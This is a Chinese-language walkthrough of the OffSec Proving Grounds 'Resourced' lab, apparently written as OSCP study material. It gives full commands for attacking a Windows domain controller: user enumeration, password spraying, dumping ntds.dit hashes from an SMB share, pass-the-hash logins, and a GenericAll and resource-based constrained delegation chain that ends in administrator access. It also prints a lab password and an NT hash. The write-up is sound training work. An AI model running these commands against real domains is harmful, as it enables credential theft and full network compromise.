OSCP Resourced Write-up

一、靶场详情

靶场名称：

Resourced

靶场地址：

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界：

enum4linux 工具枚举 –> V.Ventz 用户权限 –> SMB 目录枚举 –> system 和 ntds.dit 文件 –> 用户 hash –> nxc 密码爆破 –> L.Livingstone 用户权限 –> 用户旗帜

权限提升：

L.Livingstone 用户对域控制器 Genericall 权限 –> 系统 administrator 权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描：

sudo nmap -p- 192.168.143.175 --min-rate=2000

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49668/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49693/tcp open  unknown
49708/tcp open  unknown

UDP 端口扫描：未发现有价值信息。

TCP 服务信息搜集：

sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49666,49668,49674,49675,49693,49708 -sCV 192.168.143.175

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings:
|   DNS-SD-TCP:
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-10 02:42:55Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ResourceDC.resourced.local
| Not valid before: 2025-09-09T02:38:12
|_Not valid after:  2026-03-11T02:38:12
| rdp-ntlm-info:
|   Target_Name: resourced
|   NetBIOS_Domain_Name: resourced
|   NetBIOS_Computer_Name: RESOURCEDC
|   DNS_Domain_Name: resourced.local
|   DNS_Computer_Name: ResourceDC.resourced.local
|   DNS_Tree_Name: resourced.local
|   Product_Version: 10.0.17763
|_  System_Time: 2025-09-10T02:43:45+00:00
|_ssl-date: 2025-09-10T02:44:24+00:00; -2s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
49708/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
|   date: 2025-09-10T02:43:48
|_  start_date: N/A

系统为 Windows 域控环境，开放有 RDP、Winrm 和域控的一些默认端口。

3.2 渗透测试突破边界

3.2.1 Enum4linux 枚举泄漏 V.Ventz 用户密码

在 kali 设置域控域名、host 解析。

echo "192.168.143.175\tresourcedc.resourced.local resourced.local" | sudo tee -a /etc/hosts

使用 enum4linux 枚举靶机 smb、rcp 等服务，在 V.Ventz 用户描述信息得到用户密码。

enum4linux -a resourced.local

将用户名保存至文本中，通过 nxc 工具执行密码喷洒，测试 V.Ventz 用户可正常登录。

nxc smb resourced.local -u users -p 'HotelCalifornia194!' --continue-on-success

3.2.2 V.Ventz 用户 SMB 目录泄漏域控用户 hash 数据库，密码爆破得到 L.Livingstone 用户 hahs

利用 V.Ventz 用户枚举靶机 SMB 服务，发现其可访问 Password Audit 目录。

nxc smb resourced.local -u 'V.Ventz' -p 'HotelCalifornia194!' --shares

使用 smbclient 访问 Password Audit 目录，可得到 SYSTEM 和 ntds.dit 文件。

smbclient //resourced.local/'Password Audit' -U V.Ventz

使用 impacket-secretsdump 工具提取 SYSTEM 和 ntds.dit 文件用户 hash。

impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL

将用户 hash 保存至文本中，再次使用 nxc 执行密码爆破，得到 L.Livingstone 用户 hash。

nxc smb resourced.local -u users -H hash --continue-on-success

通过 L.Livingstone 用户 hash 登录靶机 winrm 服务。

evil-winrm -i resourced.local -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808

3.2.3 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 L.Livingstone 用户 Genericall 权限滥用

使用 bloodhound-ce-python 搜集域控信息。

bloodhound-ce-python -d resourced.local -u 'L.Livingstone' --hashes ':19a3a7550ce8c505c2d46b5e39d6f808' -ns 192.168.143.175 -c ALL --zip

bloodhound 分析发现 L.Livingstone 用户对域控制器具有 Genericall 权限。

点击 Genericall 查看攻击步骤。

步骤一： 通过 L.Livingstone 用户创建计算机账户。

impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-ip 192.168.143.175 'resourced.local/L.Livingstone' -hashes :19a3a7550ce8c505c2d46b5e39d6f808

# 注意：这里如果使用dc-host需要添加kali本地域名解析，前面已经加过了
impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host resourcedc.resourced.local 'resourced.local/L.Livingstone' -hashes :19a3a7550ce8c505c2d46b5e39d6f808

步骤二： 为创建的计算机用户添加 msDS-AllowedToActOnBehalfOfOtherIdentity 权限。

impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'RESOURCEDC$' -action 'write' 'resourced.local/L.Livingstone' -hashes=:19a3a7550ce8c505c2d46b5e39d6f808

步骤三： 利用添加的计算机账户申请 administrator 用户服务票据。

impacket-getST -spn 'cifs/resourcedc.resourced.local' -impersonate 'administrator' 'resourced.local/attackersystem$:Summer2018!'

将票据加入环境变量。

export KRB5CCNAME=~/Desktop/offsec/Resourced/administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache
klist

利用 administrator 服务票据远程连接靶机，得到系统 system 权限。

impacket-psexec resourced.local/administrator@resourcedc.resourced.local -k -no-pass

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流，欢迎点击「关于我」，通过页面中的微信公众号、邮箱或 Discord 与我联系；若您发现文章中存在任何错误或不足之处，也非常欢迎通过以上方式指出，在此一并致以衷心的感谢。 😊🫡

最后，祝您生活愉快！🌞✨